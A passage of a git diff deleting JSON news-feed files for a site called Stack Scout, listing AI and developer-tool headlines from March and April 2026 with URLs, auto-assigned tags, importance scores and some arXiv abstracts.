"ai_research" - }, - { - "title": "Build123d: A Python CAD programming library", - "url": "https://github.com/gumyr/build123d", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.49, - "date": "2026-03-29T20:58:22.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-31.json b/data/news-feed-2026-03-31.json deleted file mode 100644 index 80ba701..0000000 --- a/data/news-feed-2026-03-31.json +++ /dev/null @@ -1,271 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.546Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-31", - "article_count": 15, - "archived_story_count": 533, - "articles": [ - { - "title": "A Regression Framework for Understanding Prompt Component Impact on LLM Performance", - "url": "https://arxiv.org/abs/2603.26830", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task.", - "category": "ai_research" - }, - { - "title": "LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA", - "url": "https://blog.langchain.com/nvidia-enterprise/", - "source": "LangChain Blog", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-03-16T21:31:28.000Z", - "summary": "Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration", - "category": "ai_agents" - }, - { - "title": "Systematic debugging for AI agents: Introducing the AgentRx framework", - "url": "https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/", - "source": "Microsoft Research Blog", - "tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-03-12T16:38:45.000Z", - "summary": "As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research .", - "category": "ai_research" - }, - { - "title": "Autonomous context compression", - "url": "https://blog.langchain.com/autonomous-context-compression/", - "source": "LangChain Blog", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-03-11T18:24:27.000Z", - "summary": "TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. Older messages are replaced by", - "category": "ai_agents" - }, - { - "title": "Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals", - "url": "https://arxiv.org/abs/2603.26829", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design.", - "category": "ai_research" - }, - { - "title": "A Step Toward Federated Pretraining of Multimodal Large Language Models", - "url": "https://arxiv.org/abs/2603.26786", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines.", - "category": "ai_research" - }, - { - "title": "TED: Training-Free Experience Distillation for Multimodal Reasoning", - "url": "https://arxiv.org/abs/2603.26778", - "source": "ArXiv cs.LG (ML)", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience.", - "category": "ai_research" - }, - { - "title": "EpochX: Building the Infrastructure for an Emergent Agent Civilization", - "url": "https://arxiv.org/abs/2603.27304", - "source": "ArXiv cs.AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration.", - "category": "ai_research" - }, - { - "title": "Bitboard version of Tetris AI", - "url": "https://arxiv.org/abs/2603.26765", - "source": "ArXiv cs.AI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-03-31T04:00:00.000Z", - "summary": "arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research.", - "category": "ai_research" - }, - { - "title": "Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0", - "url": "https://www.together.ai/blog/nvidia-nemotron-3-super", - "source": "Together AI Blog", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-03-11T00:00:00.000Z", - "summary": "NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure.", - "category": "ai_tools" - }, - { - "title": "Together Evaluations now supports comparing top commercial APIs vs. open source models", - "url": "https://www.together.ai/blog/together-evaluations-v2", - "source": "Together AI Blog", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-02-02T00:00:00.000Z", - "summary": "Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform.", - "category": "ai_tools" - }, - { - "title": "Introducing deploy cli", - "url": "https://blog.langchain.com/introducing-deploy-cli/", - "source": "LangChain Blog", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.69, - "date": "2026-03-16T17:20:21.000Z", - "summary": "We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in", - "category": "ai_agents" - }, - { - "title": "Introducing LangSmith Sandboxes: Secure Code Execution for Agents", - "url": "https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/", - "source": "LangChain Blog", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-03-17T15:51:07.000Z", - "summary": "Spin up a sandbox in a single line of code with the LangSmith SDK. Now in Private Preview.", - "category": "ai_agents" - }, - { - "title": "Open SWE: An Open-Source Framework for Internal Coding Agents", - "url": "https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/", - "source": "LangChain Blog", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-03-17T15:30:00.000Z", - "summary": "Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents.", - "category": "ai_agents" - }, - { - "title": "Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups", - "url": "https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-31T14:00:00.000Z", - "summary": "Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-01.json b/data/news-feed-2026-04-01.json deleted file mode 100644 index 3d3bdd2..0000000 --- a/data/news-feed-2026-04-01.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.735Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-01", - "article_count": 15, - "archived_story_count": 894, - "articles": [ - { - "title": "MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding", - "url": "https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/", - "source": "MarkTechPost", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.743Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP", - "url": "https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/", - "source": "MarkTechPost", - "tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.720Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "UT Austin and ServiceNow Research Team Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs", - "url": "https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/", - "source": "MarkTechPost", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.737Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API", - "url": "https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/", - "source": "MarkTechPost", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.724Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.", - "url": "https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/", - "source": "Google AI Blog", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-04-01T09:34:55.903Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.", - "url": "https://www.anthropic.com/news/claude-opus-4-6", - "source": "Anthropic News", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-01T09:34:54.348Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)", - "url": "https://github.com/yannick-cw/korb", - "source": "Hacker News", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.74, - "date": "2026-03-30T06:45:58.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production", - "url": "https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production", - "source": "Stability AI Blog", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:11.176Z", - "summary": null, - "category": "creative_tools" - }, - { - "title": "NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem", - "url": "https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/", - "source": "NVIDIA AI Blog", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:05.180Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal", - "url": "https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/", - "source": "MarkTechPost", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.747Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models", - "url": "https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/", - "source": "MarkTechPost", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.735Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x", - "url": "https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.718Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows", - "url": "https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:35:03.710Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Salesforce announces an AI-heavy makeover for Slack, with 30 new features", - "url": "https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-01T09:34:58.227Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "How I contributed a new model to the Transformers library using Codex 1 day ago • 34", - "url": "https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex", - "source": "Hugging Face Blog", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-01T09:34:55.910Z", - "summary": null, - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-02.json b/data/news-feed-2026-04-02.json deleted file mode 100644 index d7ef7ba..0000000 --- a/data/news-feed-2026-04-02.json +++ /dev/null @@ -1,181 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.037Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-02", - "article_count": 11, - "archived_story_count": 120, - "articles": [ - { - "title": "Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks", - "url": "https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter", - "source": "VentureBeat AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-02T18:00:23.348Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex", - "url": "https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/", - "source": "Wired AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-02T18:00:15.314Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Google announces Gemma 4 open AI models, switches to Apache 2.0 license", - "url": "https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/", - "source": "Ars Technica AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 0.98, - "date": "2026-04-02T18:00:16.217Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere", - "url": "https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-02T06:00:27.059Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "IBM Announces Strategic Collaboration with Arm", - "url": "https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.98, - "date": "2026-04-02T08:48:44.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction", - "url": "https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-04-02T18:00:19.625Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "Google releases Gemma 4 open models", - "url": "https://deepmind.google/models/gemma/gemma-4/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-04-02T16:10:54.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Lemonade by AMD: a fast and open source local LLM server using GPU and NPU", - "url": "https://lemonade-server.ai", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8200000000000001, - "date": "2026-04-02T11:04:51.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Artemis II, NASA's boldest mission in generations, launches crew to the Moon", - "url": "https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/", - "source": "Ars Technica AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.6599999999999999, - "date": "2026-04-02T18:00:16.230Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Delve allegedly forked an open-source tool and sold it as its own", - "url": "https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6599999999999999, - "date": "2026-04-02T15:03:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Python API usage", - "url": "https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage", - "source": "Simon Willison's Blog", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.6599999999999999, - "date": "2026-04-02T06:00:31.526Z", - "summary": null, - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-03.json b/data/news-feed-2026-04-03.json deleted file mode 100644 index 2773b50..0000000 --- a/data/news-feed-2026-04-03.json +++ /dev/null @@ -1,119 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.201Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-03", - "article_count": 7, - "archived_story_count": 351, - "articles": [ - { - "title": "Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use", - "url": "https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/", - "source": "MarkTechPost", - "tags": [ - "api_update", - "product_launch", - "open_source" - ], - "matching_tags": [ - "api_update", - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-03T06:00:57.447Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language Prompts", - "url": "https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/", - "source": "MarkTechPost", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-03T14:05:05.318Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "New ways to balance cost and reliability in the Gemini API", - "url": "https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/", - "source": "Google AI Blog", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.94, - "date": "2026-04-03T06:00:46.321Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "C89cc.sh – standalone C89/ELF64 compiler in pure portable shell", - "url": "https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.74, - "date": "2026-04-01T08:41:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. (+ Skill Package)", - "url": "https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you", - "source": "Nate's Newsletter", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.6799999999999999, - "date": "2026-04-03T14:05:06.150Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Google Vids extension", - "url": "https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm", - "source": "The Verge AI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.6799999999999999, - "date": "2026-04-03T06:01:01.783Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Post Mortem: axios NPM supply chain compromise", - "url": "https://github.com/axios/axios/issues/10636", - "source": "Simon Willison's Blog", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.6799999999999999, - "date": "2026-04-03T00:00:19.000Z", - "summary": null, - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-04.json b/data/news-feed-2026-04-04.json deleted file mode 100644 index cd76d7c..0000000 --- a/data/news-feed-2026-04-04.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.356Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-04", - "article_count": 5, - "archived_story_count": 236, - "articles": [ - { - "title": "@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision", - "url": "https://x.com/CloudflareDev/status/2040459229039940068", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-04T16:20:03.318Z", - "summary": 